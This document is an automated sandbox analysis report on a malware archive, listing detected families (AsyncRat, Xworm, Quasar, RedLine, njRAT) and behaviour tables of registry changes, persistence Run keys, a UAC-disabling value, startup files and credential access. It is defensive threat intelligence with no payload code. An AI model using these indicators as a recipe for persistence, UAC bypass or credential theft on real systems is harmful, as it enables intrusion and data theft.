Analysis Overview
SHA256
16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
Threat Level: Known bad
The file Downloaders.zip was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Gurcu, WhiteSnake
Xworm
Quasar payload
Quasar family
RedLine
njRAT/Bladabindi
RedLine payload
AsyncRat
Njrat family
Suspicious use of NtCreateUserProcessOtherParentProcess
SystemBC
Asyncrat family
Gurcu family
Suspicious use of NtCreateProcessExOtherParentProcess
Systembc family
Quasar RAT
UAC bypass
Xworm family
Redline family
Async RAT payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Sets service image path in registry
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Boot or Logon Autostart Execution: Active Setup
Disables Task Manager via registry modification
Modifies Windows Firewall
Drops file in Drivers directory
Reads user/profile data of local email clients
Drops startup file
Reads user/profile data of web browsers
Loads dropped DLL
Identifies Wine through registry keys
Executes dropped EXE
Indicator Removal: Clear Windows Event Logs
Reads WinSCP keys stored on the system
Checks BIOS information in registry
Event Triggered Execution: Component Object Model Hijacking
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Writes to the Master Boot Record (MBR)
Checks installed software on the system
Adds Run key to start application
Enumerates connected drives
Installs/modifies Browser Helper Object
Accesses Microsoft Outlook profiles
Legitimate hosting services abused for malware hosting/C2
UPX packed file
Enumerates processes with tasklist
Drops autorun.inf file
Suspicious use of SetThreadContext
Detected potential entity reuse from brand MICROSOFT.
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Sets desktop wallpaper using registry
Drops file in Windows directory
Drops file in Program Files directory
System Network Configuration Discovery: Wi-Fi Discovery
Event Triggered Execution: Netsh Helper DLL
Browser Information Discovery
Unsigned PE
Enumerates physical storage devices
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Internet Connection Discovery
Program crash
Delays execution with timeout.exe
Suspicious use of UnmapMainImage
Checks processor information in registry
Modifies data under HKEY_USERS
outlook_office_path
Suspicious use of SendNotifyMessage
outlook_win_path
Runs ping.exe
Scheduled Task/Job: Scheduled Task
NTFS ADS
Modifies registry key
Enumerates system info in registry
Modifies registry class
System policy modification
Views/modifies file attributes
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Opens file in notepad (likely ransom note)
Modifies system certificate store
Suspicious behavior: LoadsDriver
Suspicious behavior: MapViewOfSection
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Modifies Internet Explorer settings
Checks SCSI registry key(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2025-02-13 04:24
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-02-13 04:24
Reported
2025-02-13 04:46
Platform
win11-20250211-en
Max time kernel
1152s
Max time network
1306s
Command Line
Signatures
AsyncRat
Asyncrat family
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gurcu family
Gurcu, WhiteSnake
Njrat family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4872 created 5332 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Desktop\Files\TPB-1.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
SystemBC
Systembc family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Xworm
Xworm family
njRAT/Bladabindi
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\Files\random.exe | N/A |
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Version = "43,0,0,0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\ = "Microsoft Edge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\StubPath = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Localized Name = "Microsoft Edge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\IsInstalled = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Disables Task Manager via registry modification
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Program Files\ProcessMonitor\Procmon64.exe | N/A |
| File opened for modification | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Users\Admin\AppData\Local\Temp\Procmon64.exe | N/A |
| File created | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Users\Admin\AppData\Local\Temp\Procmon64.exe | N/A |
| File opened for modification | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Program Files\sysint\Procmon64.exe | N/A |
| File created | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Program Files\sysint\Procmon64.exe | N/A |
| File opened for modification | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe | N/A |
| File created | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe | N/A |
| File opened for modification | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Program Files\ProcessMonitor\Procmon64.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCMON24\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCMON24.SYS" | C:\Program Files\ProcessMonitor\Procmon64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCMON24\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCMON24.SYS" | C:\Users\Admin\AppData\Local\Temp\Procmon64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCMON24\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCMON24.SYS" | C:\Program Files\sysint\Procmon64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCMON24\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCMON24.SYS" | C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\Files\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\Files\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\Desktop\Files\XClient.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\Desktop\Files\winlog32.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DriverUtil.vbs | C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\Desktop\Files\Fast%20Download.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\Desktop\Files\XClient.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Wine | C:\Users\Admin\Desktop\Files\random.exe | N/A |
Indicator Removal: Clear Windows Event Logs
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A |
Reads WinSCP keys stored on the system
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\svhost = "\"C:\\Users\\Admin\\AppData\\Roaming\\KDOT\\PerfWatson1.exe\"" | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\SystemHandler = "C:\\ProgramData\\Winsrv\\winsvc.exe" | C:\Users\Admin\AppData\Local\Temp\temp_16933.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\adbabbcfdbc = "\"C:\\ProgramData\\adbabbcfdbc.exe\"" | C:\Users\Admin\AppData\Local\Temp\temp_16943.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\adbabbcfdbc = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\temp_16943.exe\"" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\Desktop\\Files\\networkmanager.exe" | C:\Users\Admin\Desktop\Files\networkmanager.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Subsystem Framework = "\"C:\\ProgramData\\Microsoft Subsystem Framework\\winmsbt.exe\"" | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" | C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77Security = "C:\\Users\\Admin\\AppData\\Roaming\\$77Security.exe" | C:\Users\Admin\AppData\Local\Temp\$77Security.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\adbabbcfdbc = "\"C:\\ProgramData\\adbabbcfdbc.exe\"" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" | C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" | C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" | C:\Users\Admin\Desktop\Files\XClient.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" | C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\SystemHandler = "C:\\Users\\Admin\\AppData\\Local\\Temp\\temp_16933.exe" | C:\Users\Admin\AppData\Local\Temp\temp_16933.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Installs/modifies Browser Helper Object
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PHYSICALDRIVE0 | C:\Users\Admin\Desktop\Files\random.exe | N/A |
Detected potential entity reuse from brand MICROSOFT.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File created | F:\autorun.inf | C:\Users\Admin\Desktop\Files\856.exe | N/A |
| File opened for modification | F:\autorun.inf | C:\Users\Admin\Desktop\Files\856.exe | N/A |
| File created | C:\autorun.inf | C:\Users\Admin\Desktop\Files\856.exe | N/A |
| File opened for modification | C:\autorun.inf | C:\Users\Admin\Desktop\Files\856.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\svhost | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Discord | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\ctfmon | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\$77Security | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\$77svchost | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\StUpdate | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Test Task17 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\Mozilla\\Firefox\\Desktop Background.bmp" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\Files\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Files\PowerRat.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
Drops file in Windows directory
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\Rage.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\PowerRat.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\856.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\ciscotest.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\7777.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\7777.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\q1wnx5ir.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\svc1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\TPB-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\99awhy8l.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\surfex.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
